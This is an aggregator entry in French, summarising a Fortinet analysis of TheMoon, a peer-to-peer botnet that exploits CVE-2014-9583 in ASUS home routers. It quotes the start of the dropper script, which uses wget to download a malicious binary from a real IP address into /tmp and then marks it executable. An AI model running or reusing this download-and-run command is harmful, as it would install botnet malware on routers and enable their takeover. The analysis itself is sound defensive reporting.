One Article Review
| Source |  Fortinet |
|---|---|
| Identifiant | 210657 |
| Date de publication | 2016-10-20 08:52:50 (vue: 2016-10-20 08:52:50) |
| Titre | TheMoon - A P2P botnet targeting Home Routers |
| Texte | In the post “Home Routers - New Favorite of Cybercriminals in 2016â€, we discussed the active detection of vulnerability CVE-2014-9583 in ASUS routers since June of this year. In this post we will dissect a bot installed on the affected ASUS routers. The following figure shows attack traffic captured through Wireshark. Figure 1 Exploitation of CVE-2014-9583 Below is the content of file nmlt1.sh downloaded from hxxp://78.128.92.137:80/. #!/bin/sh cd /tmp rm -f .nttpd wget -O .nttpd http://78.128.92.137/.nttpd,17-mips-le-t1 chmod... |
| Notes | |
| Envoyé | Oui |
| Condensat | /bin/sh /tmp 128 137/ 137:80/ 2014 2016†9583 active affected asus attack below bot botnet captured chmod content cve cybercriminals detection discussed dissect downloaded exploitation favorite figure file following from home http://78 hxxp://78 installed june mips new nmlt1 nttpd p2p post routers shows since targeting themoon through traffic vulnerability wget will wireshark year “home |
| Tags | |
| Stories | |
| Move | 
|
L'article ne semble pas avoir été repris aprés sa publication.
L'article ne semble pas avoir été repris sur un précédent.